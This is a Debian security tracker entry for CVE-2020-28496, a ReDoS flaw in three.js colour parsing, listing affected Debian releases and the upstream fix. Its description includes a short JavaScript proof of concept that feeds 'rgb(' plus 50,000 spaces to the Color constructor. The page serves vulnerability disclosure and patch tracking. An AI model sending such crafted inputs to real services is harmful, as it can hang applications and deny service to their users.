CVE-2020-28496

NameCVE-2020-28496
DescriptionThis affects the package three before 0.125.0. This can happen when handling rgb or hsl colors. PoC: var three = require('three') function build_blank (n) { var ret = "rgb(" for (var i = 0; i < n; i++) { ret += " " } return ret + ""; } var Color = three.Color var time = Date.now(); new Color(build_blank(50000)) var time_cost = Date.now() - time; console.log(time_cost+" ms")
SourceCVE (at NVD; CERT, LWN, oss-sec, fulldisc, bugtraq, EDB, Metasploit, Red Hat, Ubuntu, Gentoo, SUSE bugzilla/CVE, Mageia, GitHub code/issues, web search, more)
NVD severitymedium

Vulnerable and fixed packages

The table below lists information on source packages.

Source PackageReleaseVersionStatus
three.js (PTS)stretch73+dfsg-1vulnerable
buster80+dfsg2-2vulnerable
bullseye, sid111+dfsg1-2vulnerable

The information below is based on the following data on fixed versions.

PackageTypeReleaseFixed VersionUrgencyOriginDebian Bugs
three.jssource(unstable)(unfixed)

Notes

[buster] - three.js <no-dsa> (Minor issue)
[stretch] - three.js <no-dsa> (can be fixed along in next DLA)
https://github.com/mrdoob/three.js/pull/21143/commits/4a582355216b620176a291ff319d740e619d583e
https://github.com/mrdoob/three.js/issues/21132

Search for package or bug name: Reporting problems